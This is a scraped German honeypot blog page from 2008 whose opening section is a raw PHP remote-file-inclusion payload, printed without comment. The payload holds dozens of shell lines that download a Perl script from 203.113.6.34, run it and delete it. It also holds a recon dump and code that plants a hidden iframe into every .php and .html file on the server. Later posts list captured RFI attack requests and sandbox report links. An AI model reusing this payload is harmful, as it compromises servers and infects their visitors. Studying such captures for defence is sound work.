@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
?>
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "AnakDompu<br />";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "AnakDompu Was Here!!<br />";
echo "uname -a: $un<br />";
echo "os: $os<br />";
echo "uptime: $up<br />";
echo "id: $id1<br />";
echo "pwd: $pwd1<br />";
echo "php: $php1<br />";
echo "software: $sof1<br />";
echo "server-name: $name1<br />";
echo "server-ip: $ip1<br />";
echo "free: $free<br />";
echo "used: $used<br />";
echo "total: $all<br />";
exit;
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src="http://203.113.6.34/adu/home.html"
width="0" height="0" frameborder="0"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>
Tuesday, June 17. 2008
[honeyd]RFI bots?
ich erstelle gerade ein paar filter-scripte zum auswerten der honeyd logs.
dies hier ist ein beispiel ergebnis für ein script das schlicht nach 'GET' und '=http' und 'nicht honey_domain' und 'nicht Referer' filtert:
die entsprechenden dateien auf www.joerg-krug.de wurden bereits entfernt. die anderen habe ich nicht ausprobiert.
wünsch spässkes. :)
CODE:
"GET /test.php?page=http://www.webhostmedic.com/p.c? HTTP/1.1
"GET //errors.php?error=http://www.bbs-bad-harzburg.de/contenido//contenido/includes/sistem.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://nozyk.org/rob.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/31337.txt?? HTTP/1.1
"GET /?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET ///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET /contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc/contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /doc/about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
einige sollten mal ihre scripte fixen ;)die entsprechenden dateien auf www.joerg-krug.de wurden bereits entfernt. die anderen habe ich nicht ausprobiert.
wünsch spässkes. :)
Saturday, June 14. 2008
[sandbox]CWSandbox - aktuelle Liste
Die aktuelle Liste der Anfragen, die durch einen fehlerhaften link in den CWSandbox emails an mich gestellt wurden,
könnt ihr ab sofort hier finden:
CWSandbox Liste
Die Liste enthält alle Anfragen mit korrigierten URLs.
könnt ihr ab sofort hier finden:
CWSandbox Liste
Die Liste enthält alle Anfragen mit korrigierten URLs.
Sunday, June 8. 2008
[sandbox]CWS linkliste
dank honeyd, yourwebinterface.comy,grep und awk habe ich eine liste mit den links erstellt,
die bisher bei mir eingeschlagen sind.
die bisher bei mir eingeschlagen sind.
http://cwsandbox.org/?page=samdet&id=175933&password=zzdwm http://cwsandbox.org/?page=samdet&id=175933&password=zzdwm http://cwsandbox.org/?page=samdet&id=175972&password=ekect http://cwsandbox.org/?page=samdet&id=175972&password=ekect http://cwsandbox.org/?page=samdet&id=176052&password=kdors http://cwsandbox.org/?page=samdet&id=176089&password=pfxcq http://cwsandbox.org/?page=samdet&id=176995&password=pqboe http://cwsandbox.org/?page=samdet&id=177228&password=mjouj http://cwsandbox.org/?page=samdet&id=177228&password=mjouj http://cwsandbox.org/?page=samdet&id=176473&password=zrwiz http://cwsandbox.org/?page=samdet&id=174432&password=exehr http://cwsandbox.org/?page=samdet&id=176947&password=zfcfl http://cwsandbox.org/?page=samdet&id=176947&password=zfcfl http://cwsandbox.org/?page=samdet&id=177367&password=ssiwk http://cwsandbox.org/?page=samdet&id=177071&password=deuyg http://cwsandbox.org/?page=samdet&id=176965&password=bkqfa http://cwsandbox.org/?page=samdet&id=177541&password=wkfhe http://cwsandbox.org/?page=samdet&id=176908&password=rkbdi http://cwsandbox.org/?page=samdet&id=176908&password=rkbdi http://cwsandbox.org/?page=samdet&id=177158&password=kulfn http://cwsandbox.org/?page=samdet&id=176995&password=pqboe http://cwsandbox.org/?page=samdet&id=177665&password=ecwnw http://cwsandbox.org/?page=samdet&id=177564&password=aoytr http://cwsandbox.org/?page=samdet&id=177564&password=aoytr http://cwsandbox.org/?page=samdet&id=177835&password=ucalk http://cwsandbox.org/?page=samdet&id=177829&password=uhxea http://cwsandbox.org/?page=samdet&id=177748&password=jotnx http://cwsandbox.org/?page=samdet&id=177907&password=admlf http://cwsandbox.org/?page=samdet&id=177866&password=seiid http://cwsandbox.org/?page=samdet&id=177925&password=ohjnr http://cwsandbox.org/?page=samdet&id=178078&password=ksfne http://cwsandbox.org/?page=samdet&id=178078&password=ksfne http://cwsandbox.org/?page=samdet&id=174413&password=iemhx http://cwsandbox.org/?page=samdet&id=176858&password=bmvjo http://cwsandbox.org/?page=samdet&id=178160&password=hejah http://cwsandbox.org/?page=samdet&id=178246&password=eixcf http://cwsandbox.org/?page=samdet&id=177877&password=zpazz http://cwsandbox.org/?page=samdet&id=177877&password=zpazz http://cwsandbox.org/?page=samdet&id=177858&password=gufsf http://cwsandbox.org/?page=samdet&id=176858&password=bmvjo http://cwsandbox.org/?page=samdet&id=178304&password=bafcp http://cwsandbox.org/?page=samdet&id=175277&password=fgbjk http://cwsandbox.org/?page=samdet&id=178304&password=bafcp http://cwsandbox.org/?page=samdet&id=178052&password=fnqgq http://cwsandbox.org/?page=samdet&id=177877&password=zpazz http://cwsandbox.org/?page=samdet&id=177877&password=zpazz http://cwsandbox.org/?page=samdet&id=177877&password=zpazz http://cwsandbox.org/?page=samdet&id=177877&password=zpazz http://cwsandbox.org/?page=samdet&id=177858&password=gufsf http://cwsandbox.org/?page=samdet&id=177858&password=gufsf http://cwsandbox.org/?page=samdet&id=177877&password=zpazz http://cwsandbox.org/?page=samdet&id=177764&password=obcet http://cwsandbox.org/?page=samdet&id=177558&password=cioox http://cwsandbox.org/?page=samdet&id=177558&password=cioox http://cwsandbox.org/?page=samdet&id=175276&password=eycku http://cwsandbox.org/?page=samdet&id=177042&password=fqnff http://cwsandbox.org/?page=samdet&id=176205&password=jacga http://cwsandbox.org/?page=samdet&id=177321&password=trgqc http://cwsandbox.org/?page=samdet&id=177507&password=ttnrj http://cwsandbox.org/?page=samdet&id=174363&password=zksal http://cwsandbox.org/?page=samdet&id=174709&password=szubj http://cwsandbox.org/?page=samdet&id=177055&password=cfwta http://cwsandbox.org/?page=samdet&id=169979&password=nnqis http://cwsandbox.org/?page=samdet&id=169979&password=nnqis http://cwsandbox.org/?page=samdet&id=108640&password=edjgq http://cwsandbox.org/?page=samdet&id=108640&password=edjgq http://cwsandbox.org/?page=samdet&id=118355&password=obeqs http://cwsandbox.org/?page=samdet&id=118355&password=obeqs http://cwsandbox.org/?page=samdet&id=118355&password=obeqs http://cwsandbox.org/?page=samdet&id=137678&password=rqqgz http://cwsandbox.org/?page=samdet&id=122380&password=xzxom http://cwsandbox.org/?page=samdet&id=127219&password=fduxz http://cwsandbox.org/?page=samdet&id=137678&password=rqqgz http://cwsandbox.org/?page=samdet&id=157645&password=qtyax http://cwsandbox.org/?page=samdet&id=157645&password=qtyax http://cwsandbox.org/?page=samdet&id=150896&password=engsr http://cwsandbox.org/?page=samdet&id=173136&password=xffyi http://cwsandbox.org/?page=samdet&id=167703&password=oinjc http://cwsandbox.org/?page=samdet&id=169979&password=nnqis http://cwsandbox.org/?page=samdet&id=169979&password=nnqis http://cwsandbox.org/?page=samdet&id=169979&password=nnqis http://cwsandbox.org/?page=samdet&id=178433&password=foout http://cwsandbox.org/?page=samdet&id=178433&password=foout http://cwsandbox.org/?page=samdet&id=178433&password=foout http://cwsandbox.org/?page=samdet&id=178767&password=mwmgb http://cwsandbox.org/?page=samdet&id=178990&password=klhcm http://cwsandbox.org/?page=samdet&id=178990&password=klhcm http://cwsandbox.org/?page=samdet&id=167531&password=yeeuc http://cwsandbox.org/?page=samdet&id=178466&password=jkbhm http://cwsandbox.org/?page=samdet&id=178466&password=jkbhm http://cwsandbox.org/?page=samdet&id=179012&password=lqizd http://cwsandbox.org/?page=samdet&id=179012&password=lqizd http://cwsandbox.org/?page=samdet&id=179012&password=lqizd http://cwsandbox.org/?page=samdet&id=179012&password=lqizd http://cwsandbox.org/?page=samdet&id=178466&password=jkbhm http://cwsandbox.org/?page=samdet&id=179019&password=zkmel http://cwsandbox.org/?page=samdet&id=179019&password=zkmel http://cwsandbox.org/?page=samdet&id=79285&password=bvuea http://cwsandbox.org/?page=samdet&id=79285&password=bvuea http://cwsandbox.org/?page=samdet&id=179069&password=nlkxj http://cwsandbox.org/?page=samdet&id=178506&password=clobf http://cwsandbox.org/?page=samdet&id=178506&password=clobf http://cwsandbox.org/?page=samdet&id=178466&password=jkbhm http://cwsandbox.org/?page=samdet&id=174129&password=baffn http://cwsandbox.org/?page=samdet&id=174129&password=baffn http://cwsandbox.org/?page=samdet&id=179414&password=kmxau http://cwsandbox.org/?page=samdet&id=179416&password=wttwn http://cwsandbox.org/?page=samdet&id=108640&password=edjgq http://cwsandbox.org/?page=samdet&id=89923&password=qgydv http://cwsandbox.org/?page=samdet&id=89923&password=qgydv http://cwsandbox.org/?page=samdet&id=179184&password=etgpp http://cwsandbox.org/?page=samdet&id=179184&password=etgpp http://cwsandbox.org/?page=samdet&id=179184&password=etgpp http://cwsandbox.org/?page=samdet&id=179184&password=etgpp http://cwsandbox.org/?page=samdet&id=179594&password=smycp http://cwsandbox.org/?page=samdet&id=179594&password=smycp http://cwsandbox.org/?page=samdet&id=79377&password=wpzyr http://cwsandbox.org/?page=samdet&id=79377&password=wpzyr
(Page 1 of 1, totaling 7 entries)
Pages
katsumi's page
GROSPOLINA.ORG
Glastopf Webhoneypot
Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina
GROSPOLINA.ORG
Glastopf Webhoneypot
Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina
Links
gut verglast ist ....
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt
Quicksearch
Categories
Archives
Top Referrers
www.netcraft.com (10)
www.bing.com (8)
www.google.de (7)
www.google.com.hk (4)
server19.xlhost.de (2)
www.google.ca (2)
www.google.com.br (2)
florent.clairambault.fr (1)
glasblog.1durch0.de (1)
medsleader.net (1)
www.bing.com (8)
www.google.de (7)
www.google.com.hk (4)
server19.xlhost.de (2)
www.google.ca (2)
www.google.com.br (2)
florent.clairambault.fr (1)
glasblog.1durch0.de (1)
medsleader.net (1)
Letzte Goggele Suche
dumme musikindustrie
T-dreams Announcement Script SQL Injection Vulnerability
glastopf
feed me milw0rm
server4you handle
katsumi
http://www.example.com/mail_this_entry/mail_autocheck.php?pm_path=shell link
1h
WikiLeaks.ORG
rfi bot php
massachuset bot net
Glastöpfe
mail_this_entry mail_autocheck.php
installation honeypot
glastopf
RFI List For An IRC
[[[[[[[phttp://www.mozilla.com/en-US/firefox/3.
xkcd matrix
was ist robtex
glastopf MySQLdb
stichi o polina
das neue game yum haus anubis
"Now Is The Time Infiltrate Your System "
was ist rfi injection
glastopf joomla
glastopf test
katsumi
schwester string
pbot rfi
was ist robtex
Text Jeder Tag ist ein neuer anfang
Iranisches Nouruz -Fest
T-dreams Announcement Script SQL Injection Vulnerability
glastopf
feed me milw0rm
server4you handle
katsumi
http://www.example.com/mail_this_entry/mail_autocheck.php?pm_path=shell link
1h
WikiLeaks.ORG
rfi bot php
massachuset bot net
Glastöpfe
mail_this_entry mail_autocheck.php
installation honeypot
glastopf
RFI List For An IRC
[[[[[[[phttp://www.mozilla.com/en-US/firefox/3.
xkcd matrix
was ist robtex
glastopf MySQLdb
stichi o polina
das neue game yum haus anubis
"Now Is The Time Infiltrate Your System "
was ist rfi injection
glastopf joomla
glastopf test
katsumi
schwester string
pbot rfi
was ist robtex
Text Jeder Tag ist ein neuer anfang
Iranisches Nouruz -Fest
Syndicate This Blog
Exploit-db, feed me!
Error on line 137 of /usr/local/lib/php/s9y-supersized/bundled-libs/Onyx/RSS.php: The specified file could not be opened. (#)
Glasfeed
No RSS/OPML feed selected